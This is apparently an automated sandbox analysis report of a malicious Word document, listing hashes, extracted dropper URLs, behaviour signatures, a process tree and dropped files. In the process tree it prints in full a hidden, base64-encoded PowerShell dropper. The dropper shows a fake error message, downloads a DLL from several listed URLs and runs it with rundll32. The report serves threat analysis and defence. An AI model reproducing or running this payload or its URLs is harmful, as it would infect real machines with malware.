Analysis

  • max time kernel
    29s
  • max time network
    26s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    12-01-2021 18:54

General

  • Target

    1e5ba7feae7b768efa4b74971596661f28e23d722010fc606dfbc09d0689c2af.doc

  • Size

    157KB

  • MD5

    3df758a4a5e94106bd7137973aa6c7c9

  • SHA1

    520121c19668d015e1008c54a6b82639294c60de

  • SHA256

    1e5ba7feae7b768efa4b74971596661f28e23d722010fc606dfbc09d0689c2af

  • SHA512

    5a03b77ab69d57440ca3d15ac0ac488ab118a658cfdb165639570e82d9eb3d84215ff03b28c63f4b4fd8f0de1ce48ef6a69a2e7be0d23a30e0123eff4d2d8f49

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://shulovbaazar.com/c/bcL6/

exe.dropper

https://mybusinessevent.com/tiki-install/e/

exe.dropper

http://uhk.cncranes.com/ErrorPages/3/

exe.dropper

https://capturetheaction.com.au/wp-includes/Yjp/

exe.dropper

https://thenetworker.ca/comment/8N4/

exe.dropper

https://trayonlinegh.com/cgi-bin/HBPR/

exe.dropper

http://mmo.martinpollock.co.uk/a/SQSGg/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1e5ba7feae7b768efa4b74971596661f28e23d722010fc606dfbc09d0689c2af.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1400
  • C:\Windows\system32\cmd.exe
    cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIAcgAnACkAKwAnAG8AJwArACgAJwByACcAKwAnAFAAYQBnAGUAcwAnACkAKwAnAC8AMwAnACsAJwAvACcAKwAnAEAAJwArACgAJwB3AF0AeABtACcAKwAnAFsAdgBzACcAKQArACcAOgAvACcAKwAnAC8AJwArACcAYwBhACcAKwAnAHAAJwArACgAJwB0AHUAcgAnACsAJwBlACcAKwAnAHQAaABlAGEAYwAnACkAKwAnAHQAaQAnACsAJwBvACcAKwAnAG4AJwArACcALgAnACsAKAAnAGMAbwBtAC4AJwArACcAYQB1ACcAKQArACgAJwAvACcAKwAnAHcAcAAtACcAKwAnAGkAbgBjACcAKQArACcAbAB1ACcAKwAnAGQAJwArACgAJwBlAHMAJwArACcALwBZACcAKQArACcAagBwACcAKwAoACcALwBAACcAKwAnAHcAXQAnACsAJwB4AG0AWwB2AHMAOgAnACsAJwAvAC8AdABoACcAKQArACcAZQBuACcAKwAoACcAZQAnACsAJwB0AHcAJwArACcAbwByAGsAJwArACcAZQByAC4AYwAnACkAKwAoACcAYQAnACsAJwAvAGMAJwApACsAJwBvAG0AJwArACcAbQBlACcAKwAnAG4AdAAnACsAJwAvACcAKwAnADgAJwArACcATgA0ACcAKwAnAC8AJwArACcAQAAnACsAJwB3ACcAKwAoACcAXQB4AG0AJwArACcAWwB2ACcAKQArACgAJwBzADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwB0AHIAJwApACsAKAAnAGEAJwArACcAeQBvAG4AbABpAG4AJwApACsAJwBlACcAKwAnAGcAJwArACcAaAAuACcAKwAoACcAYwBvACcAKwAnAG0ALwAnACsAJwBjAGcAaQAtAGIAaQAnACkAKwAoACcAbgAnACsAJwAvAEgAQgBQACcAKwAnAFIALwBAACcAKQArACcAdwBdACcAKwAnAHgAbQAnACsAKAAnAFsAdgAnACsAJwA6AC8ALwBtAG0AbwAnACsAJwAuACcAKQArACgAJwBtACcAKwAnAGEAcgAnACkAKwAnAHQAaQAnACsAKAAnAG4AcABvAGwAbABvACcAKwAnAGMAJwArACcAawAuAGMAbwAuACcAKQArACgAJwB1AGsAJwArACcALwBhAC8AJwArACcAUwBRAFMAJwApACsAJwBHACcAKwAnAGcAJwArACcALwAnACkALgAiAHIAZQBgAFAAYABMAGEAYwBFACIAKAAoACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAJwB2ACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACgAJwBoACcAKwAnAHQAdAAnACkAKwAnAHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAFMAcABMAGAAaQBUACIAKAAkAEUANwA3AEsAIAArACAAJABOADMAMQA3ADYAYwByACAAKwAgACQAVQAxADEASAApADsAJABZADgAXwBZAD0AKAAoACcASwA5ACcAKwAnADAAJwApACsAJwBHACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATAB5AHQAdwB6ADIAcwAgAGkAbgAgACQAWAA0AF8AMQBxADgAcQApAHsAdAByAHkAewAoAC4AKAAnAE4AZQAnACsAJwB3AC0ATwAnACsAJwBiAGoAZQBjAHQAJwApACAAUwBZAHMAVABFAG0ALgBuAEUAdAAuAFcAZQBCAEMAbABpAEUATgB0ACkALgAiAGQAbwBXAG4AYABMAGAAbwBBAGQAZgBJAGAATABFACIAKAAkAEwAeQB0AHcAegAyAHMALAAgACQATwBqAGkAaABuAHcAZwApADsAJABaADgAMwBRAD0AKAAnAFgAMAAnACsAJwAzAEcAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAE8AagBpAGgAbgB3AGcAKQAuACIATABgAGUATgBHAHQAaAAiACAALQBnAGUAIAAzADIAOAAxADcAKQAgAHsALgAoACcAcgAnACsAJwB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQATwBqAGkAaABuAHcAZwAsACgAKAAnAFMAJwArACcAaABvACcAKQArACgAJwB3AEQAaQAnACsAJwBhACcAKwAnAGwAbwAnACkAKwAnAGcAQQAnACkALgAiAHQAYABvAHMAVABSAEkAYABOAGcAIgAoACkAOwAkAFkANgA5AEwAPQAoACcASwA4ACcAKwAnADQAVgAnACkAOwBiAHIAZQBhAGsAOwAkAFYAXwAyAFYAPQAoACcAWAAwACcAKwAnADcAUwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEANQAxAE8APQAoACgAJwBIACcAKwAnAF8AMwAnACkAKwAnAEcAJwApAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:3516
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:768
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwersheLL -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIAcgAnACkAKwAnAG8AJwArACgAJwByACcAKwAnAFAAYQBnAGUAcwAnACkAKwAnAC8AMwAnACsAJwAvACcAKwAnAEAAJwArACgAJwB3AF0AeABtACcAKwAnAFsAdgBzACcAKQArACcAOgAvACcAKwAnAC8AJwArACcAYwBhACcAKwAnAHAAJwArACgAJwB0AHUAcgAnACsAJwBlACcAKwAnAHQAaABlAGEAYwAnACkAKwAnAHQAaQAnACsAJwBvACcAKwAnAG4AJwArACcALgAnACsAKAAnAGMAbwBtAC4AJwArACcAYQB1ACcAKQArACgAJwAvACcAKwAnAHcAcAAtACcAKwAnAGkAbgBjACcAKQArACcAbAB1ACcAKwAnAGQAJwArACgAJwBlAHMAJwArACcALwBZACcAKQArACcAagBwACcAKwAoACcALwBAACcAKwAnAHcAXQAnACsAJwB4AG0AWwB2AHMAOgAnACsAJwAvAC8AdABoACcAKQArACcAZQBuACcAKwAoACcAZQAnACsAJwB0AHcAJwArACcAbwByAGsAJwArACcAZQByAC4AYwAnACkAKwAoACcAYQAnACsAJwAvAGMAJwApACsAJwBvAG0AJwArACcAbQBlACcAKwAnAG4AdAAnACsAJwAvACcAKwAnADgAJwArACcATgA0ACcAKwAnAC8AJwArACcAQAAnACsAJwB3ACcAKwAoACcAXQB4AG0AJwArACcAWwB2ACcAKQArACgAJwBzADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwB0AHIAJwApACsAKAAnAGEAJwArACcAeQBvAG4AbABpAG4AJwApACsAJwBlACcAKwAnAGcAJwArACcAaAAuACcAKwAoACcAYwBvACcAKwAnAG0ALwAnACsAJwBjAGcAaQAtAGIAaQAnACkAKwAoACcAbgAnACsAJwAvAEgAQgBQACcAKwAnAFIALwBAACcAKQArACcAdwBdACcAKwAnAHgAbQAnACsAKAAnAFsAdgAnACsAJwA6AC8ALwBtAG0AbwAnACsAJwAuACcAKQArACgAJwBtACcAKwAnAGEAcgAnACkAKwAnAHQAaQAnACsAKAAnAG4AcABvAGwAbABvACcAKwAnAGMAJwArACcAawAuAGMAbwAuACcAKQArACgAJwB1AGsAJwArACcALwBhAC8AJwArACcAUwBRAFMAJwApACsAJwBHACcAKwAnAGcAJwArACcALwAnACkALgAiAHIAZQBgAFAAYABMAGEAYwBFACIAKAAoACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAJwB2ACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACgAJwBoACcAKwAnAHQAdAAnACkAKwAnAHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAFMAcABMAGAAaQBUACIAKAAkAEUANwA3AEsAIAArACAAJABOADMAMQA3ADYAYwByACAAKwAgACQAVQAxADEASAApADsAJABZADgAXwBZAD0AKAAoACcASwA5ACcAKwAnADAAJwApACsAJwBHACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATAB5AHQAdwB6ADIAcwAgAGkAbgAgACQAWAA0AF8AMQBxADgAcQApAHsAdAByAHkAewAoAC4AKAAnAE4AZQAnACsAJwB3AC0ATwAnACsAJwBiAGoAZQBjAHQAJwApACAAUwBZAHMAVABFAG0ALgBuAEUAdAAuAFcAZQBCAEMAbABpAEUATgB0ACkALgAiAGQAbwBXAG4AYABMAGAAbwBBAGQAZgBJAGAATABFACIAKAAkAEwAeQB0AHcAegAyAHMALAAgACQATwBqAGkAaABuAHcAZwApADsAJABaADgAMwBRAD0AKAAnAFgAMAAnACsAJwAzAEcAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAE8AagBpAGgAbgB3AGcAKQAuACIATABgAGUATgBHAHQAaAAiACAALQBnAGUAIAAzADIAOAAxADcAKQAgAHsALgAoACcAcgAnACsAJwB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQATwBqAGkAaABuAHcAZwAsACgAKAAnAFMAJwArACcAaABvACcAKQArACgAJwB3AEQAaQAnACsAJwBhACcAKwAnAGwAbwAnACkAKwAnAGcAQQAnACkALgAiAHQAYABvAHMAVABSAEkAYABOAGcAIgAoACkAOwAkAFkANgA5AEwAPQAoACcASwA4ACcAKwAnADQAVgAnACkAOwBiAHIAZQBhAGsAOwAkAFYAXwAyAFYAPQAoACcAWAAwACcAKwAnADcAUwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEANQAxAE8APQAoACgAJwBIACcAKwAnAF8AMwAnACkAKwAnAEcAJwApAA==
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:412
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Wdduy2m\Tmc1kuo\J70H.dll,ShowDialogA
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3272
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Wdduy2m\Tmc1kuo\J70H.dll,ShowDialogA
            4⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:848
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jgaptmulpegvsw\vchgwvntmdqgr.lwy",ShowDialogA
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:2080

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Wdduy2m\Tmc1kuo\J70H.dll
      MD5

      f2e548b38b405d6e23c355f14822ea7d

      SHA1

      d6dfa10cb978e374fb04d509f69fa30b091bf7c6

      SHA256

      ab4641a4737fa0d56956108872bc1fab2fb62655993e1448be031a7815841806

      SHA512

      4db3d52bb5e987642e3065fd71fa222132dde5d4a8fb9d5dbe54e5789d7d4e2c18f6a6a99a1812a760e2211b278861be0a08c11bc5992d1f37be615e5b9e4814

    • \Users\Admin\Wdduy2m\Tmc1kuo\J70H.dll
      MD5

      f2e548b38b405d6e23c355f14822ea7d

      SHA1

      d6dfa10cb978e374fb04d509f69fa30b091bf7c6

      SHA256

      ab4641a4737fa0d56956108872bc1fab2fb62655993e1448be031a7815841806

      SHA512

      4db3d52bb5e987642e3065fd71fa222132dde5d4a8fb9d5dbe54e5789d7d4e2c18f6a6a99a1812a760e2211b278861be0a08c11bc5992d1f37be615e5b9e4814

    • memory/412-4-0x0000000000000000-mapping.dmp
    • memory/412-5-0x00007FFB4BB80000-0x00007FFB4C56C000-memory.dmp
      Filesize

      9.9MB

    • memory/412-6-0x000001C6BB210000-0x000001C6BB211000-memory.dmp
      Filesize

      4KB

    • memory/412-7-0x000001C6BB540000-0x000001C6BB541000-memory.dmp
      Filesize

      4KB

    • memory/768-3-0x0000000000000000-mapping.dmp
    • memory/848-10-0x0000000000000000-mapping.dmp
    • memory/1400-2-0x00007FFB52C70000-0x00007FFB532A7000-memory.dmp
      Filesize

      6.2MB

    • memory/2080-12-0x0000000000000000-mapping.dmp
    • memory/3272-8-0x0000000000000000-mapping.dmp